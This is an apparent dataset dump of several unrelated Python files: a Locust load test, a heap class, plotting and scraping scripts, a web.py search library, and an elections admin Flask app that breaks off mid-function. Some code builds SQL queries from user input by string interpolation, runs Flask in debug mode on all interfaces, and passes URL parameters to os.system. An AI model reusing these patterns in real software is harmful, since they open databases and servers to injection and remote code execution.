text stringlengths 8 6.05M |
|---|
import logging
from locust import TaskSet, task
logger = logging.getLogger(__name__)
class UserBehavior(TaskSet):
    """Locust TaskSet that logs in against the REST API and then polls
    the currency endpoint of the package app.

    -- ChangeLog:
    Sunday 27 May 2018 08:10:32 AM IST
    @jawahar273 [Version 0.1]
    -1- Init Code
    """

    def __init__(self, parent):
        super().__init__(parent=parent)
        # Full "Token <key>" header value; the key part is filled in by login().
        self.token_key = "Token "

    def base_url(self):
        """Return the base URL path of the API server."""
        return "/api/"

    def packages_url(self):
        """Return the URL prefix for the package app."""
        return self.base_url() + "package/"

    def user_details(self):
        """Return the load-testing username and password."""
        return {"username": "demo", "password": "demobmmb"}

    def on_start(self):
        """Called when a Locust user starts, before any task is scheduled."""
        self.login()

    def login(self):
        """Authenticate and remember the auth token for later requests."""
        logger.info("login user")
        response = self.client.post(
            self.base_url() + "rest-auth/login/", data=self.user_details()
        )
        # BUGFIX: the old code appended the *raw response body* to the header
        # prefix (and kept appending on every login).  django-rest-auth
        # returns the token as {"key": "..."}; rebuild the header from it.
        try:
            key = response.json().get("key", "")
        except ValueError:  # non-JSON body (e.g. an HTML error page)
            key = ""
        self.token_key = "Token " + key
        logger.debug("response from host %s (status %s)",
                     response.text, response.status_code)

    @task(1)
    def currency_details(self):
        """Call the currency details API and log the response status code."""
        currency = self.client.get(
            self.packages_url() + "currency/",
            # BUGFIX: DRF TokenAuthentication reads the "Authorization"
            # header, not a lowercase "authentication" header.
            headers={"Authorization": self.token_key},
        )
        if currency.status_code >= 300:
            logger.debug("response from host for currency {}".format(currency.text))
        else:
            logger.info("success in currency: {}".format(currency.status_code))
|
import calendar


def day_of_birth_name(year_of_birth, month_of_birth, date_of_birth):
    """Return the weekday name (e.g. 'Saturday') for the given birth date."""
    weekday_index = calendar.weekday(year_of_birth, month_of_birth, date_of_birth)
    return calendar.day_name[weekday_index]


if __name__ == "__main__":
    age = int(input('ENTER YOUR AGE: \n'))
    date = int(input('ENTER DATE OF BIRTHDAY IN FIGURES: \n'))
    month = int(input('ENTER MONTH OF BIRTH IN FIGURES: \n'))
    current_year = int(input('ENTER CURRENT YEAR: \n'))
    # NOTE: approximate -- assumes the birthday already occurred this year;
    # otherwise the computed year of birth is off by one.
    year_of_birth = current_year - age
    day_string = day_of_birth_name(year_of_birth, month, date)
    print('you were born on ' + day_string + ',' + str(date) + ',' + str(month) + ',' + str(year_of_birth))
|
import web
import re
def unique(seq):
    """Return the distinct elements of *seq* as a list (insertion order kept)."""
    return list(dict.fromkeys(seq))


def unique2(seqx):
    """Split each non-empty ';'-separated record in *seqx* and return the
    distinct items."""
    # BUGFIX: the body referenced an undefined name ``seq`` instead of the
    # ``seqx`` parameter, raising NameError on every call.
    modlist = [r.split(";") for r in seqx if r != '']
    mods = [i for s in modlist for i in s]  # flatten
    return unique(mods)
# Module database (SQLite); shared handle used by every query helper below.
db = web.database(dbn='sqlite', db='modules.db')
def regexp(expr, item):
    """SQLite REGEXP hook: 1 when *expr* matches *item* (case-insensitive), else 0."""
    match = re.search(expr, item, re.IGNORECASE)
    return 1 if match is not None else 0
def install_regexp():
    # Register the Python regexp() above as the SQL REGEXP function on the
    # underlying sqlite3 connection (web.py keeps it on a per-thread ctx).
    db._getctx().db.create_function('REGEXP', 2, regexp)
def where_clause(fields, key, words=True):
    """Build an SQL WHERE fragment matching *key* against each of *fields*,
    OR-ed together and wrapped in parentheses.

    A '%' in *key* triggers a LIKE match; otherwise REGEXP with word
    boundaries (words=True) or plain equality (words=False) is used.

    NOTE(review): values are interpolated straight into the SQL string;
    web.websafe() HTML-escapes but does not SQL-escape, so this is
    injection-prone -- parameterised queries would be safer.
    """
    if '%' in key:
        key = (web.websafe(key),) * len(fields)
        clause = "%s LIKE '%s'"
        where = " OR ".join([ clause %(f,k) for f,k in zip(fields, key)])
    else:
        if words:
            install_regexp()
            clause="%s REGEXP '\\b%s\\b'"
        else:
            clause="%s = '%s'"
        key = (web.websafe(key),) * len(fields)
        where=" OR ".join([ clause % (f,k) for f, k in zip(fields, key)])
    return "(" + where + ")"
def multi_search(field, fields, keys, combine, words):
    """Build a WHERE expression for whitespace-separated search terms.

    '*' wildcards are translated to SQL '%'.  field == 'any' searches all
    of *fields*; per-term clauses are joined with *combine*.

    NOTE(review): when *field* is a plain string (not 'any'), where_clause
    zips over its characters -- looks like callers always pass 'any' or a
    tuple; confirm against the call sites.
    """
    keys=keys.replace("*", "%").split()
    if field=='any':
        field=fields
    where=combine.join(where_clause(field, key, words=words) for key in keys)
    return where
def search_for_species(field, keys, limit=None, offset=None,
                       words=True, count=False, combine=" OR "):
    """Search the species table on id/name/sciname.

    count=True returns a single count(*) row (limit/offset ignored);
    otherwise the matching rows are returned as a list.
    """
    where=multi_search(field, ('id', 'name', 'sciname'), keys,
                       combine, words=words)
    if count:
        what="count(*) as count"
        limit=None
        offset=None
    else:
        what="*"
    res=db.select('species', what=what, where=where,
                  limit=limit, offset=offset)
    return list(res)
def get_modules_for_species(spec, which='3'):
    """For each species id in *spec* return a ';'-joined string of module ids.

    which='1' -> non-predicted modules only (ids not starting with 'p'),
    which='2' -> predicted modules only, anything else -> all modules.
    """
    if which=='1':
        where="id NOT LIKE 'p%' AND "
    elif which=='2':
        where="id LIKE 'p%' AND "
    else:
        where=""
    def get_mod(s):
        # NOTE(review): the species id is %-interpolated into the SQL string.
        res=db.select('module', what="id",
                      where=where + ("species LIKE '%%%s%%'" % s))
        return ";".join([str(r.id) for r in res])
    return [get_mod(s) for s in spec]
def get_modules_for_tissues(tiss, which='3'):
    """For each tissue id in *tiss* return a ';'-joined string of module ids.

    which='1' -> non-predicted modules only, '2' -> predicted only,
    anything else -> all modules.
    """
    if which=='1':
        where="id NOT LIKE 'p%%' AND tissues LIKE '%%%s%%'"
    elif which=='2':
        where="id LIKE 'p%%' AND tissues LIKE '%%%s%%'"
    else:
        where="tissues LIKE '%%%s%%'"
    def get_mod(s):
        res=db.select('module', what="id", where=where % s)
        return ";".join([str(r.id) for r in res])
    return [get_mod(s) for s in tiss]
def search_for_tissue(field, keys, limit=None, offset=None,
                      words=True, count=False, combine=" OR "):
    """Search the tissue table on id/name; see search_for_species."""
    where=multi_search(field, ('id', 'name'), keys, combine, words=words)
    if count:
        what="count(*) as count"
        limit=None
        offset=None
    else:
        what="*"
    res=db.select('tissue', what=what, where=where,
                  limit=limit, offset=offset)
    return list(res)
def search_for_gene(field, keys, limit=None, offset=None, words=True,
                    count=False, combine=" OR "):
    """Search the gene table on ensembl/entrez/symbol/name.

    Non-count results are ordered by symbol; see search_for_species.
    """
    where=multi_search(field, ('ensembl', 'entrez', 'symbol', 'name'), keys,
                       combine, words=words)
    if count:
        what="count(*) as count"
        limit=None
        offset=None
        order=None
    else:
        what="*"
        order="symbol"
    res=db.select('gene', what=what, where=where,
                  limit=limit, offset=offset, order=order)
    return list(res)
def search_for_enrichment(field, keys, limit=None, offset=None,
                          words=True, count=False, combine=" OR "):
    """Search the category table on id/name, ordered by name; see
    search_for_species for the count/limit semantics."""
    where=multi_search(field, ('id', 'name'), keys, combine, words=words)
    if count:
        what="count(*) as count"
        limit=None
        offset=None
        order=None
    else:
        what="*"
        order="name"
    res=db.select('category', what=what, where=where,
                  limit=limit, offset=offset, order=order)
    return list(res)
def get_module_types():
    # All rows of the module_type lookup table (web.py iterator, not a list).
    return db.select('module_type')
def get_modules(mods):
    """Return the module rows whose id is in *mods*.

    NOTE(review): ids are quoted and concatenated into the IN clause by
    hand -- injection-prone like the rest of this module.
    """
    res=db.select('module', where='id in (' +
                  ",".join(["'%s'" % str(m) for m in mods]) + ')')
    return list(res)
def get_module(m):
    # Single-module lookup by id; returns a web.py result iterator.
    return db.select('module', where="id='%s'" % m)
def get_enrichment(c):
    # All enrichment rows for the given category id.
    return db.select('enrichment', where="category='%s'" % c)
def modules_for_species(field, keys, mods, which, words=True, combine=" OR "):
    """Extend *mods* (module id -> HTML annotation string) with modules
    whose species match the search terms.

    which='1' restricts to non-predicted modules (id not starting with
    'p'), '2' to predicted ones.  Returns the updated *mods* dict (also
    mutated in place).
    """
    where=multi_search(field, ('id', 'name', 'sciname'), keys, combine,
                       words=words)
    spec=[s.id for s in db.select('species', what='id', where=where)]
    spec=unique(spec)
    if len(spec)==0:
        return mods
    where=" OR ".join("species LIKE '%%%s%%'" % s for s in spec)
    if which=='1':
        where="id NOT LIKE 'p%' AND (" + where + ")"
    elif which=='2':
        where="id LIKE 'p%' AND (" + where + ")"
    specmods=db.select('module', what='id,species', where=where)
    for rec in specmods:
        m=str(rec.id)
        # The species column stores ';'-separated "<prefix>:<id>" pairs.
        for s in rec.species.split(";"):
            s2=s.split(":")[1]
            if s2 in spec:
                if m in mods:
                    mods[m]=mods[m] + '; <span class="s">%s</span>' % s2
                else:
                    mods[m]='<span class="s">%s</span>' % s2
    return mods
def modules_for_tissue(field, keys, mods, which, words=True, combine=" OR "):
    """Extend *mods* with modules whose tissues match the search terms;
    mirrors modules_for_species but annotates with class="t" spans."""
    where=multi_search(field, ('id', 'name'), keys, combine, words=words)
    tiss=[t.id for t in db.select('tissue', what='id', where=where)]
    tiss=unique(tiss)
    if len(tiss)==0:
        return mods
    where=" OR ".join("tissues LIKE '%%%s%%'" % t for t in tiss)
    if which=='1':
        where="id NOT LIKE 'p%' AND (" + where + ")"
    elif which=='2':
        where="id LIKE 'p%' AND (" + where + ")"
    tissmods=db.select('module', what='id,tissues', where=where)
    for rec in tissmods:
        m=str(rec.id)
        # The tissues column stores ';'-separated "<prefix>:<id>" pairs.
        for t in rec.tissues.split(";"):
            t2=t.split(":")[1]
            if t2 in tiss:
                if m in mods:
                    mods[m]=mods[m] + '; <span class="t">%s</span>' % t2
                else:
                    mods[m]='<span class="t">%s</span>' % t2
    return mods
def modules_for_gene(field, keys, mods, which, words=True, combine=" OR "):
    """Extend *mods* with modules containing genes that match the search
    terms; annotations use the gene symbol.  See modules_for_species."""
    where=multi_search(field, ("ensembl", "entrez", "symbol", "name"),
                       keys, combine, words=words)
    genes=db.select("gene", what='modules,symbol', where=where)
    for rec in genes:
        if rec.modules=='':
            continue;
        for m in rec.modules.split(";"):
            # Module ids starting with 'p' are predicted modules.
            if (which=='1' and m[0]=='p') or (which=='2' and m[0]!='p'):
                continue
            s=rec.symbol.replace(";", ", ")
            if m in mods:
                mods[m]=mods[m] + '; <span class="g">%s</span>' % s
            else:
                mods[m]='<span class="g">%s</span>' % s
    return mods
def modules_for_enrichment(field, keys, mods, which, words=True,
                           combine=" OR "):
    """Extend *mods* with modules whose enrichment categories match the
    search terms; annotations use the category name."""
    where=multi_search(field, ('id', 'name'), keys, combine, words=words)
    cats=db.select('category', what="modules,name", where=where)
    for rec in cats:
        if rec.modules=='':
            continue;
        for m in rec.modules.split(";"):
            # Module ids starting with 'p' are predicted modules.
            if (which=='1' and m[0]=='p') or (which=='2' and m[0]!='p'):
                continue
            n=rec.name
            if m in mods:
                mods[m]=mods[m] + '; <span class="e">%s</span>' % n
            else:
                mods[m]='<span class="e">%s</span>' % n
    return mods
|
# Usage: python app.py
from PIL import Image
from io import BytesIO
from flask import Flask, request, jsonify
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
import numpy as np
import os
# Path to the trained Keras classifier; loaded once at import time.
model_path = 'model/5_model_akurasi_93_91_93.h5'
model = load_model(model_path)
def predict(file):
    """Classify raw image bytes with the global Keras model.

    Returns a length-1 numpy array holding the predicted class index.
    """
    img = Image.open(BytesIO(file))
    # BUGFIX: Image.ANTIALIAS was deprecated and removed in Pillow 10;
    # LANCZOS is the same filter under its long-standing official name.
    img = img.resize((160, 160), Image.LANCZOS)
    img = img_to_array(img)
    # Model expects a batch dimension: (1, 160, 160, channels).
    img = np.expand_dims(img, axis=0)
    result = model.predict(img)
    y_pred = np.argmax(result, axis=1)
    return y_pred
app = Flask(__name__)


@app.route("/")
def hello():
    # Simple liveness endpoint.
    return "Machine Learning Prediction Endpoint"
# Class index -> human-readable plant label (order matches the model output).
PLANT_LABELS = [
    "Aglaonema",
    "Janda Bolong",
    "Kuping Gajah",
    "Lidah Mertua",
    "Sirih Gading",
    "Tanaman Lipstik Gantung",
    "Tanaman Suplir",
]


@app.route('/predict', methods=['POST'])
def upload_file():
    """Accept an uploaded image ('file' form field) and return the
    predicted label as JSON: {"result": "<label>"}."""
    if request.method == 'POST':
        file = request.files['file'].read()
        result = predict(file)
        # BUGFIX: predict() returns a length-1 numpy array; comparing it
        # with == produced array results.  Take a plain int index and look
        # the label up in a table instead of a long elif chain.
        index = int(result[0])
        if 0 <= index < len(PLANT_LABELS):
            label = PLANT_LABELS[index]
        else:
            label = "Data not found"
        return jsonify(result=label)
if __name__ == "__main__":
    # PORT env var wins (e.g. on a PaaS); default 8080.
    app.run(debug=True, host='0.0.0.0', port=int(os.environ.get("PORT", 8080)))
|
#!/usr/bin/python
from copy import deepcopy
class MaxHeap:
    """Array-backed binary max-heap.

    The backing list is 1-indexed: arr[0] is a None sentinel so that the
    children of node k live at 2*k and 2*k+1.
    """

    def __init__(self, arr=None):
        """Initialise from *arr*, which must already satisfy the heap
        property (the constructor does not heapify)."""
        # BUGFIX: a mutable default argument (arr=list()) is shared across
        # calls; use None and build a fresh list instead.
        self.arr = deepcopy(arr) if arr is not None else []
        if len(self.arr) == 0 or self.arr[0] is not None:
            self.arr = [None] + self.arr

    def insert(self, v):
        """Add value *v* to the heap."""
        self.arr.append(v)
        self.swim(len(self.arr) - 1)

    def del_max(self):
        """Remove and return the largest value."""
        v_max = self.arr[1]
        self._exchange(1, len(self.arr) - 1)
        self.arr.pop()
        self.sink(1)
        return v_max

    def is_empty(self):
        """True when no values are stored (only the sentinel remains)."""
        # BUGFIX: was an unimplemented stub that returned None.
        return len(self.arr) <= 1

    def swim(self, k):
        """Bubble the value at index k up until its parent is >= it."""
        # BUGFIX: parent index must use floor division (k // 2); plain
        # k / 2 yields a float index on Python 3 and raises TypeError.
        while k > 1 and self.arr[k] > self.arr[k // 2]:
            self._exchange(k, k // 2)
            k = k // 2

    def sink(self, k):
        """Push the value at index k down until both children are <= it."""
        while 2 * k < len(self.arr):
            j = 2 * k
            # Pick the larger child to compare against.
            if 2 * k + 1 < len(self.arr) and self.arr[2 * k] < self.arr[2 * k + 1]:
                j = 2 * k + 1
            if self.arr[j] <= self.arr[k]:
                break
            self._exchange(k, j)
            k = j

    def _exchange(self, k1, k2):
        # Swap two slots; tuple assignment needs no deepcopy of the values.
        self.arr[k1], self.arr[k2] = self.arr[k2], self.arr[k1]

    def check_max_heap(self):
        """Verify the heap invariant for every node; True when valid."""
        # BUGFIX: xrange is Python 2 only; range works on both.
        size = len(self.arr)
        for k in range(1, size):
            k_l = False if (2 * k) < size and self.arr[2 * k] > self.arr[k] else True
            k_r = False if (2 * k + 1) < size and self.arr[2 * k + 1] > self.arr[k] else True
            if not (k_l and k_r):
                return False
        return True
if __name__ == "__main__":
    # Sample data for manual experimentation; the exercising code below was
    # left commented out (note: it is Python 2 print syntax).
    a = [30, 27, 23, 17, 16, 15, 13, 14, 18, 11]
    b = []
    x = MaxHeap()
    # r = x.del_max()
    # print str(r) + " is deleted"
    # print x.arr
    # res = x.check_max_heap()
    #
    # # print res
    # for i in range(10, 0, -1):
    #     print i
from .CreateCeedlingModule import *
from .OpenCeedlingFile import *
__all__ = ["CreateCeedlingModuleCommand", "OpenCeedlingFileCommand"]
|
from contextlib import contextmanager
from typing import Callable, Iterator, List, TYPE_CHECKING
if TYPE_CHECKING: # prevent circular imports for type checking
from simulation.state import State # noqa
ValidatorMethod = Callable[['State'], None]
class ValidationError(Exception):
    """Raised when a simulation validation condition is violated.

    Keeps a stack of execution contexts so the error can report which
    step(s) were running when the violation occurred.
    """
    def __init__(self, msg: str):
        super().__init__(msg)
        self._ctx: List[str] = []

    def push_context(self, ctx: str) -> None:
        """Record that this error propagated out of the context *ctx*.

        The context is an arbitrary label giving users a hint about the
        origin of the failure, even when plugins are allowed to make
        arbitrary changes to the system state.
        """
        self._ctx.append(ctx)

    def __str__(self) -> str:
        text = super().__str__()
        for label in self._ctx:
            text = f'After execution of "{label}": ' + text
        return text


@contextmanager
def context(name: str) -> Iterator[None]:
    """Create a labelled "validation context".

    Any ValidationError escaping the with-block is tagged with *name*;
    other exceptions are reported and re-raised unchanged.
    """
    try:
        yield
    except ValidationError as err:
        err.push_context(name)
        raise
    except Exception:
        # TODO: use simulation logger
        print(f'ERROR: Unhandled exception raised while executing "{name}"')
        raise
|
import matplotlib.pyplot as plt
import numpy as np
import numpy.random as npr
import cPickle as pickle  # NOTE(review): Python 2 only; use pickle on Py3
import os
import seaborn as sns
sns.set_style("white")
current_palette = sns.color_palette()
npr.seed(42)
# Experiments to plot; each has a pickled mixture-of-Gaussians result file.
exp_types = ["random", "flux", "redshift"]
out_dir = "/Users/acm/Dropbox/Proj/astro/DESIMCMC/tex/quasar_z/NIPS2015/"
for exp_type in exp_types:
    # load MOG
    mog_exp_file = "../analysis_mog/%s/results.pkl"%exp_type
    with open(mog_exp_file, 'rb') as handle:
        mog_dict = pickle.load(handle)
    mog_specs = mog_dict['spec_ids']
    mog_preds = mog_dict['preds']
    mog_true = mog_dict['z_true']
    mog_per = mog_dict['preds_per']
    fig = plt.figure(figsize=(8, 8))
    max_z = max(mog_preds.max(), mog_true.max())
    min_z = min(mog_true.min() - .2, 2.2)
    # Identity line: the perfect-prediction reference.
    plt.plot([min_z, max_z], [min_z, max_z], linewidth=2, alpha=.5)
    # BUGFIX: np was used here but numpy was never imported as np
    # (only numpy.random as npr) -- "import numpy as np" added above.
    plt_idx = np.arange(0, len(mog_true), 8)
    for n in plt_idx:
        # Vertical bar spanning the posterior percentile interval.
        plt.plot([mog_true[n], mog_true[n]], [mog_per[n,0], mog_per[n,-1]],
                 alpha = .15, color = 'grey', linewidth=1)
    plt.scatter(mog_true[plt_idx], mog_preds[plt_idx], color=current_palette[2], alpha = 1.0)
    plt.xlim(min_z, max_z)
    plt.ylim(min_z, max_z)
    plt.xlabel("$z_{spec}$", fontsize=40, labelpad=20)
    plt.ylabel("$z_{photo}$", fontsize=40, rotation='horizontal', labelpad=40)
    if exp_type != 'random':
        plt.ylabel("")
    plt.tick_params(axis='both', which='major', labelsize=20)
    #plt.title("Posterior expectation model predictions", fontsize=14)
    plt.savefig(os.path.join(out_dir, "scatter_exp-%s.pdf"%exp_type), bbox_inches='tight')
# z_pred = np.zeros(len(qso_sample_files))
# z_pred_mode = np.zeros(len(qso_sample_files))
# z_lo = np.zeros(len(z_pred))
# z_hi = np.zeros(len(z_pred))
# z_true = np.zeros(len(z_pred))
# z_lo0 = np.zeros(len(z_pred))
# z_hi0 = np.zeros(len(z_pred))
# q_inds = np.zeros(len(z_pred))
# mode_sample = np.zeros(len(z_pred), dtype=np.int)
# expected_m = np.zeros(len(z_pred))
# expected_w = np.zeros((len(z_pred), 4))
# for i, qso_samp_file in enumerate(qso_sample_files):
# if i%25==0: print "%d of %d"%(i, len(qso_sample_files))
# try:
# th_samps, lls, q_idx, qso_info, chain_idx = load_redshift_samples(qso_samp_file)
# except:
# print "skipping %d"%i
# continue
# q_inds[i] = q_idx
#
# Nsamps = th_samps.shape[0]
# # compare predict to true
# z_true[i] = qso_info['Z_VI']
# z_pred[i] = th_samps[Nsamps/2:, 0].mean()
# z_lo[i], z_hi[i] = np.percentile(th_samps[Nsamps/2:, 0], [.5, 99.5])
# z_lo0[i], z_hi0[i] = np.percentile(th_samps[Nsamps/2:, 0], [5, 95])
#
# # kernel density estimate to find the highest mode
# z_unique = np.unique(th_samps[Nsamps/2:, 0])
# density = kde.gaussian_kde(z_unique, bw_method = .08 ) #'silverman')
# mode_sample[i] = density(z_unique).argmax()
# z_pred_mode[i] = z_unique[ mode_sample[i] ]
#
# # expected magnitude/
# expected_m[i] = np.exp(th_samps[Nsamps/2:, -1]).mean()
#
# # expected weights
# ws = np.exp(th_samps[Nsamps/2:, 1:-1])
# ws /= np.sum(ws, axis=1, keepdims=True)
# expected_w[i, :] = ws.mean(axis=0)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from abc import *
# ˄
class Element(object, metaclass=ABCMeta):
    """Abstract Visitor-pattern element; concrete subclasses implement
    accept() to dispatch themselves to a visitor."""
    # NOTE(review): the arrow markers below look like round-trip
    # code-generator region delimiters -- kept intact.
    # ˅
    # ˄

    @abstractmethod
    def accept(self, visitor):
        """Dispatch this element to *visitor* (implemented by subclasses)."""
        # ˅
        pass
        # ˄

    # ˅
    # ˄


# ˅
# ˄
|
import urllib
from BeautifulSoup import*
# Python 2 script: prompt for a URL and dump every anchor tag's href,
# first child and attribute list using the legacy BeautifulSoup 3 API.
url=raw_input('Enter url:')
html=urllib.urlopen(url).read()
soup=BeautifulSoup(html)
tags=soup('a')
for tag in tags:
    print 'TAG:',tag
    print 'URL:',tag.get('href',None)
    print 'Content:',tag.contents[0]
    print 'Attrs:',tag.attrs
#!/usr/bin/env python
import argparse
import csv
import glob
import json
import io
import os
import re
try:
set
except NameError:
from sets import Set as set
import datetime
from csvkit import py2
from flask import Flask, render_template, request, make_response, Response
import peewee
from peewee import *
from playhouse.postgres_ext import *
import models
import utils
app = Flask(__name__)
# Debug mode is always on; this admin app is assumed to run on a trusted
# internal network, not exposed publicly.
app.debug=True
@app.route('/elections/<raceyear>/admin/<racedate>/archive/')
def archive_list(racedate, raceyear):
    """List archived result snapshots (JSON files under /tmp/<racedate>/)
    for an election date, newest first, capped at 750 entries."""
    racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
        user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
        host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
    )
    models.database_proxy.initialize(racedate_db)
    context = utils.build_context(racedate, raceyear)
    # NOTE(review): sorting dicts with key=lambda x: x only works on
    # Python 2; on Python 3 comparing dicts raises TypeError.
    context['files'] = sorted(
        [
            {
                "name": f.split('/')[-1],
                # File names end in "-<unix timestamp>.json"; recover the date.
                "date": datetime.datetime.fromtimestamp(float(f.split('/')[-1].split('-')[-1].split('.json')[0]))
            }
            for f in glob.glob('/tmp/%s/*.json' % racedate)
        ],
        key=lambda x:x,
        reverse=True
    )[:750]
    context['states'] = []
    state_list = sorted(list(set([race.statepostal for race in models.ElexRace.select()])), key=lambda x: x)
    for state in state_list:
        race = models.ElexRace.select().where(models.ElexRace.statepostal == state)[0]
        state_dict = {}
        state_dict['statepostal'] = state
        state_dict['report'] = None
        state_dict['report_description'] = None
        context['states'].append(state_dict)
    return render_template('archive_list.html', **context)
@app.route('/elections/<raceyear>/admin/<racedate>/archive/<filename>')
def archive_detail(racedate, filename, raceyear):
    """Return the raw contents of one archived snapshot file.

    SECURITY: *filename* comes straight from the URL; strip any directory
    components so a crafted name (e.g. ..%2F..%2Fetc/passwd) cannot escape
    the /tmp/<racedate>/ directory.
    """
    safe_name = os.path.basename(filename)
    with open('/tmp/%s/%s' % (racedate, safe_name), 'r') as readfile:
        return readfile.read()
@app.route('/elections/<raceyear>/admin/<racedate>/')
def race_list(racedate, raceyear):
    """Admin landing page: every distinct race plus per-state report info.

    Database errors are caught and rendered on an error page instead of
    surfacing as a 500.
    """
    context = utils.build_context(racedate, raceyear)
    context['races'] = []
    context['states'] = []
    try:
        racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
            user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
            host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
        )
        models.database_proxy.initialize(racedate_db)
        context['races'] = [r for r in models.ElexResult.raw("""select officename, seatname, race_unique_id, raceid, statepostal, accept_ap_calls from elex_results group by officename, seatname, race_unique_id, raceid, statepostal, accept_ap_calls""")]
        state_list = sorted(list(set([race.statepostal for race in models.ElexRace.select()])), key=lambda x: x)
        for state in state_list:
            race = models.OverrideRace.select().where(models.OverrideRace.statepostal == state)[0]
            state_dict = {}
            state_dict['statepostal'] = state
            state_dict['report'] = race.report
            context['states'].append(state_dict)
        return render_template('race_list.html', **context)
    except peewee.OperationalError as e:
        context['error'] = e
        return render_template('error.html', **context)
    except peewee.ProgrammingError as e:
        context['error'] = e
        return render_template('error.html', **context)
@app.route('/elections/<raceyear>/admin/<racedate>/script/<script_type>/', methods=['GET'])
def scripts(racedate, script_type, raceyear):
    """Run one of the prd loader shell scripts for this race date.

    SECURITY: both *script_type* and *racedate* are URL-controlled and are
    interpolated into a shell command, so restrict them to safe characters
    before calling os.system to prevent command injection.
    """
    base_command = '. /home/ubuntu/.virtualenvs/loaderpypy/bin/activate && cd /home/ubuntu/elex-loader/ && '
    safe_token = re.compile(r'^[A-Za-z0-9_-]+$')
    if not (safe_token.match(script_type) and safe_token.match(racedate)):
        return json.dumps({"message": "invalid parameters", "output": "1"})
    if request.method == 'GET':
        o = "1"
        if script_type == 'bake':
            pass
        else:
            o = os.system('%s./scripts/prd/%s.sh %s' % (base_command, script_type, racedate))
        return json.dumps({"message": "success", "output": o})
@app.route('/elections/<raceyear>/admin/<racedate>/csv/', methods=['POST'])
def overrides_post(racedate, raceyear):
    """Receive override CSV text (races and/or candidates) from the admin
    form and write it into the elex-loader overrides directory."""
    if request.method == 'POST':
        payload = dict(request.form)
        candidates_text = None
        races_text = None
        # Form values arrive as single-item lists; unwrap the first element.
        if payload.get('candidates_text', None):
            candidates_text = str(payload['candidates_text'][0])
        if payload.get('races_text', None):
            races_text = str(payload['races_text'][0])
        if races_text:
            with open('../elex-loader/overrides/%s_override_races.csv' % racedate, 'w') as writefile:
                writefile.write(races_text)
        if candidates_text:
            with open('../elex-loader/overrides/%s_override_candidates.csv' % racedate, 'w') as writefile:
                writefile.write(candidates_text)
        return json.dumps({"message": "success"})
@app.route('/elections/<raceyear>/admin/<racedate>/csv/<override>/', methods=['GET'])
def overrides_csv(racedate, override, raceyear):
    """Export the current race or candidate overrides as a CSV download."""
    racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
        user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
        host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
    )
    models.database_proxy.initialize(racedate_db)
    if request.method == 'GET':
        output = ''
        if override == 'race':
            objs = [r.serialize() for r in models.OverrideRace.select()]
        if override == 'candidate':
            objs = [r.serialize() for r in models.OverrideCandidate.select()]
        # NOTE(review): Python 2 only -- uses unicode() and csvkit's py2
        # writer on a bytes buffer; objs is unbound (NameError) for any
        # override value other than 'race'/'candidate', and empty objs
        # would raise IndexError below.
        output = io.BytesIO()
        fieldnames = [unicode(k) for k in objs[0].keys()]
        writer = py2.CSVKitDictWriter(output, fieldnames=list(fieldnames))
        writer.writeheader()
        writer.writerows(objs)
        output = make_response(output.getvalue())
        output.headers["Content-Disposition"] = "attachment; filename=override_%ss.csv" % override
        output.headers["Content-type"] = "text/csv"
        return output
@app.route('/elections/<raceyear>/admin/<racedate>/state/<statepostal>/', methods=['POST'])
def state_detail(racedate, statepostal, raceyear):
    """Apply a posted report override to every race in one state, then
    refresh the views."""
    racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
        user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
        host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
    )
    models.database_proxy.initialize(racedate_db)
    if request.method == 'POST':
        payload = utils.clean_payload(dict(request.form))
        races = [r.race_unique_id for r in models.ElexRace.select().where(models.ElexRace.statepostal == statepostal)]
        for r in races:
            o = models.OverrideRace.get(models.OverrideRace.race_unique_id==r)
            o.report=payload['report']
            o.save()
        utils.update_views(models.database_proxy)
        return json.dumps({"message": "success"})
@app.route('/elections/<raceyear>/admin/<racedate>/race/<raceid>/', methods=['GET', 'POST'])
def race_detail(racedate, raceid, raceyear):
    """GET: render the admin detail page for one race (candidates, AP
    winner, per-state scaffolding).  POST: create/update the race's
    OverrideRace from form data (winner, runoff, etc.) and refresh views.

    NOTE(review): *raceid* is %-interpolated into raw SQL below -- SQL
    injection risk; parameterised queries would be safer.
    """
    if request.method == 'GET':
        try:
            racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
                user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
                host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
            )
            models.database_proxy.initialize(racedate_db)
            context = utils.build_context(racedate, raceyear)
            context['race'] = [r for r in models.ElexResult.raw("""select officename, seatname, race_unique_id, raceid, statepostal, accept_ap_calls from elex_results where race_unique_id = '%s' group by officename, seatname, race_unique_id, raceid, statepostal, accept_ap_calls""" % raceid)][0]
            context['candidates'] = models.ElexResult.raw("""select nyt_runoff, party, nyt_winner, candidate_unique_id, first, last from elex_results where race_unique_id = '%s' group by nyt_runoff, party, nyt_winner, candidate_unique_id, first, last order by last, first DESC;""" % raceid)
            context['ap_winner'] = None
            ap_winner = [m for m in models.ElexResult.raw("""select candidate_unique_id, first, last, winner, nyt_winner, nyt_called from elex_results where race_unique_id = '%s' and winner = 'true' group by candidate_unique_id, first, last, winner, nyt_winner, nyt_called order by last, first DESC;""" % raceid)]
            if len(ap_winner) > 0:
                context['ap_winner'] = ap_winner[0]
            context['states'] = []
            state_list = sorted(list(set([race.statepostal for race in models.ElexRace.select()])), key=lambda x: x)
            for state in state_list:
                race = models.ElexRace.select().where(models.ElexRace.statepostal == state)[0]
                state_dict = {}
                state_dict['statepostal'] = state
                state_dict['report'] = None
                state_dict['report_description'] = None
                context['states'].append(state_dict)
            return render_template('race_detail.html', **context)
        except peewee.OperationalError as e:
            # NOTE(review): if the error is raised before build_context()
            # runs, ``context`` is unbound here and this raises NameError.
            context['error'] = e
            return render_template('error.html', **context)
    if request.method == 'POST':
